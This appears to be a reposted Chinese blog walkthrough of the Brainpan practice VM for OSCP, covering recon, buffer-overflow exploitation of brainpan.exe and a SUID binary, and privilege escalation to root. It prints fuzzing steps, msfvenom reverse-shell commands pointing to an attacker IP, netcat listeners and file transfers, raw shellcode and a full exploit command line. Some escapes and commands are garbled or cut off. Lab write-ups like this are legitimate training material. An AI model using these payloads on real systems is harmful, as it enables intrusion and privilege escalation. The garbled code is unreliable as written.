OSCP Brainpan 靶机渗透

Brainpan 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-24

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、OSCP Brainpan 靶机渗透

然后我们nmap一下看看哪些端口是开放的

nmap -p- -A 172.16.1.8
OSCP Brainpan 靶机渗透

只开放了9999与10000端口,不知道干啥的,dirb扫描下10000端口

dirb http://172.16.1.8:10000

OSCP Brainpan 靶机渗透

发现bin目录,我们打开看下,有个exe,是windows可执行文件,我们开启windows虚拟机进行下载,然后逆向看看会不会发现什么

OSCP Brainpan 靶机渗透

二、逆向brainpan.exe

用OD打开brainpan.exe

OSCP Brainpan 靶机渗透

点运行,允许访问

OSCP Brainpan 靶机渗透

然后启用kali对我们windows主机进行端口扫描,发现windows开启了9999端口

OSCP Brainpan 靶机渗透

从github上下载缓冲区溢出模板,也可以自己写,模板比较方便

git clone https://github.com/jessekurrus/brainpan

OSCP Brainpan 靶机渗透

文件夹里面包含了很多文件,我们看看brainfuzzer.py脚本是干嘛的

OSCP Brainpan 靶机渗透

向brainpan.exe传字符,每次涨100个A,看什么时候崩溃

执行python brainfuzzer.py 172.16.1.16 9999

OSCP Brainpan 靶机渗透

提示900+字符的时候程序崩溃,我们再看看OD的情况,EIP已经被A覆盖了

OSCP Brainpan 靶机渗透

我们用msf生成字符序列900个

locate pattern_create

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 900

OSCP Brainpan 靶机渗透

修改brainpan1.py里面的字符序列

OSCP Brainpan 靶机渗透

重启OD,然后运行brainpan1.py脚本

python brainpan1.py 172.16.1.16 9999

OSCP Brainpan 靶机渗透

EIP直接变成了35724134 我们记录下来,然后使用msf计算偏移量

locate pattern_offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134

OSCP Brainpan 靶机渗透

偏移量为524

编辑brainpan2.py

OSCP Brainpan 靶机渗透

重启OD,运行brainpan2.py

OSCP Brainpan 靶机渗透

EIP成功被42覆盖,也就是我们脚本中的B

我们打开brainpan3.py,看看是什么

OSCP Brainpan 靶机渗透

往EIP后传badchars,尝试运行brainpan3.py,记得重置OD

OSCP Brainpan 靶机渗透

EIP后面成功被badchars覆盖

现在我们需要查找jmp esp在哪

locate nasm_shell

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

OSCP Brainpan 靶机渗透

回OD搜索FFE4

OSCP Brainpan 靶机渗透

地址为311712F3

现在我们msf生成反弹shell

msfvenom -p windows/shell_reverse_OSCP Brainpan 靶机渗透

将生成的payload粘贴进brainpan4.py

OSCP Brainpan 靶机渗透

在windows上运行brainpan.exe

本地开启监听

nc -nvlp 443

运行brainpan4.py

成功反弹shell

OSCP Brainpan 靶机渗透

这证明这个溢出脚本执行正确,我们把windows反弹shell换成linux,对主机进行缓冲区溢出攻击

msfvenom -p linux/x86/shell_reverse_tcp lport=443 lhost=172.16.1.4 -e x86/shikata_ga_nai -b "x00" -f py

OSCP Brainpan 靶机渗透

将生成的payload粘贴到brainpan5.py

OSCP Brainpan 靶机渗透

本地开启msf监听

OSCP Brainpan 靶机渗透

执行brainpan5.py

python brainpan5.py 172.16.1.8 9999

成功获得反弹shell

三、提权

切换交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'
OSCP Brainpan 靶机渗透

查看执行权限,发现validate有权限

find / -perm -4000 -type f

OSCP Brainpan 靶机渗透OSCP Brainpan 靶机渗透

他好像让我们输入什么,我们把他下载下来看看

本地开启监听

nc -nvlp 4444 > validate

受害机发送文件

nc -w 3 172.16.1.4 4444 < /usr/local/bin/validate

OSCP Brainpan 靶机渗透

我们赋予validate执行权限,然后往里面传字符直到溢出

OSCP Brainpan 靶机渗透

200字符时候溢出了

使用msf生成200个字符序列

OSCP Brainpan 靶机渗透

开启debugger

gdb validate

run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1AOSCP Brainpan 靶机渗透

计算偏移量,为116

OSCP Brainpan 靶机渗透

所以溢出代码为

116个A+4个B+(200-116-4)个C

run $(python -c "print 'A' * 116 + 'B' * 4 + 'C' *(200-116-4)")

OSCP Brainpan 靶机渗透

查找jmp eax位置

objdump -d validate | grep eax | grep jmp

发现没有,那么就找call

objdump -d validate | grep eax | grep call

OSCP Brainpan 靶机渗透

运用badchars再确认下

run $(python -c "print 'A' * 116 + 'B' * 4 + 'x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff'")

OSCP Brainpan 靶机渗透

生成反弹shell

msfvenom -p linux/x86/exec CMD=/bin/sh -b 'x00x09x0ax10x20x46' -f py

OSCP Brainpan 靶机渗透

把payload直接连起来,没用的去掉作为最终的payload

xdbxc3xb8xb9x6excexc9xd9x74x24xf4x5bx31xc9xb1x0bx31x43x1ax83xc3x04x03x43x16xe2x4cx04xc5x91x37x8bxbfx49x6ax4fxc9x6dx1cxa0xbax19xdcxd6x13xb8xb5x48xe5xdfx17x7dxfdx1fx97x7dxd1x7dxfex13x02xf1x68xecx0bxa6xe1x0dx7exc8

在受害机中执行payload

/usr/local/bin/validate $(python -c "print 'xdbxc3xb8xb9x6excexc9xd9x74x24xf4x5bx31xc9xb1x0bx31x43x1ax83xc3x04x03x43x16xe2x4cx04xc5x91x37x8bxbfx49x6ax4fxc9x6dx1cxa0xbax19xdcxd6x13xb8xb5x48xe5xdfx17x7dxfdx1fx97x7dxd1x7dxfex13x02xf1x68xecx0bxa6xe1x0dx7exc8' + 'x90' * 46 + 'xafx84x04x08'")

前面为我们的payload占用70个字符

'x90' * 46为我们补充的nop(116-70)

'xafx84x04x08'为call eax

成功提权,我们可以看到/home/anansi/bin/anansi_util不需要passwd

OSCP Brainpan 靶机渗透

cp -r /bin/bash anansi_util

OSCP Brainpan 靶机渗透

四、总结

这个靶机考验缓冲区溢出的技术,多学习逆向,最后提权为root的时候要善于发现,最终达成目标,加油!

 

 

版权声明:玥玥 发表于 2021-03-25 14:31:49。
转载请注明:OSCP Brainpan 靶机渗透 | 女黑客导航